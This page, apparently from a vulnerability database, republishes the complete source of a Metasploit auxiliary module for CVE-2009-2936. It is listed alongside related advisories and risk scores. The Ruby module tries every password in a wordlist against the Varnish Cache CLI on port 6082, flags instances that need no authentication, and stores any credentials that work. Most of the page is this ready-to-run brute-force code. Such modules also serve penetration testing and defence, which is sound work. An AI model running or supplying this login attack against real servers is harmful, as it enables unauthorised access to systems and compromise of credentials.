Varnish Cache CLI Login Utility

🗓️ 31 Aug 2024 00:00:00Reported by h00die, aushack, metasploit.comType

packetstorm🔗 packetstormsecurity.com👁 235 Views

Varnish Cache CLI Login Utility, attempts bruteforce login with password

Reporter	Title	Published	Views	Family All 21
0day.today	Varnish Cache CLI Interface Remote Code Execution Exploit	21 Dec 201400:00	–	zdt
ATTACKERKB	CVE-2009-2936	5 Apr 201000:00	–	attackerkb
ATTACKERKB	CVE-2007-2617	11 May 200700:00	–	attackerkb
Circl	CVE-2009-2936	29 May 201815:50	–	circl
CVE	CVE-2009-2936	5 Apr 201016:00	–	cve
Cvelist	CVE-2009-2936	5 Apr 201016:00	–	cvelist
Debian CVE	CVE-2009-2936	5 Apr 201016:00	–	debiancve
exploitpack	Varnish Cache CLI Interface - Remote Code Execution (Metasploit)	19 Dec 201400:00	–	exploitpack
Fedora	[SECURITY] Fedora 13 Update: varnish-2.1.0-2.fc13	29 Apr 201007:10	–	fedora
Tenable Nessus	Fedora 13 : varnish-2.1.0-2.fc13 (2010-6719)	1 Jul 201000:00	–	nessus

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'metasploit/framework/credential_collection'  
require 'metasploit/framework/login_scanner/varnish'  
require 'metasploit/framework/tcp/client'  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::Tcp  
include Msf::Auxiliary::Report  
include Msf::Auxiliary::Scanner  
include Metasploit::Framework::Varnish::Client  
  
def initialize  
super(  
'Name' => 'Varnish Cache CLI Login Utility',  
'Description' => 'This module attempts to login to the Varnish Cache (varnishd) CLI instance using a bruteforce  
list of passwords.',  
'References' =>  
[  
[ 'OSVDB', '67670' ],  
[ 'CVE', '2009-2936' ],  
[ 'EDB', '35581' ],  
[ 'URL', 'https://www.varnish-cache.org/trac/wiki/CLI' ]  
],  
'Author' =>  
[  
'aushack', #original module  
'h00die <[email protected]>' #updates and standardizations  
],  
'License' => MSF_LICENSE  
)  
  
register_options(  
[  
Opt::RPORT(6082),  
OptPath.new('PASS_FILE', [ true, 'File containing passwords, one per line',  
File.join(Msf::Config.data_directory, 'wordlists', 'unix_passwords.txt') ])  
])  
  
# We don't currently support an auth mechanism that uses usernames, so we'll ignore any  
# usernames that are passed in.  
@strip_usernames = true  
end  
  
def run_host(ip)  
# first check if we even need auth  
begin  
connect  
if !require_auth?  
print_good "#{ip}:#{rport} - Login Successful: No Authentication Required"  
close_session  
disconnect  
return  
else  
vprint_status "#{ip}:#{rport} - Authentication Required"  
end  
close_session  
disconnect  
rescue Rex::ConnectionError, EOFError, Timeout::Error  
print_error "#{ip}:#{rport} - Unable to connect"  
end  
  
cred_collection = Metasploit::Framework::CredentialCollection.new(  
pass_file: datastore['PASS_FILE'],  
username: '<BLANK>'  
)  
scanner = Metasploit::Framework::LoginScanner::VarnishCLI.new(  
configure_login_scanner(  
host: ip,  
port: rport,  
cred_details: cred_collection,  
stop_on_success: true,  
connection_timeout: 10,  
framework: framework,  
framework_module: self,  
)  
)  
scanner.scan! do |result|  
credential_data = result.to_h  
credential_data.merge!(  
module_fullname: fullname,  
workspace_id: myworkspace_id  
)  
if result.success?  
credential_core = create_credential(credential_data)  
credential_data[:core] = credential_core  
create_credential_login(credential_data)  
  
print_good "#{ip}:#{rport} - Login Successful: #{result.credential.private}"  
else  
invalidate_login(credential_data)  
vprint_error "#{ip}:#{rport} - LOGIN FAILED: #{result.credential.private}"  
end  
end  
end  
end  
`

31 Aug 2024 00:00Current

6.6Medium risk

Vulners AI Score6.6

CVSS 27.5

EPSS0.6839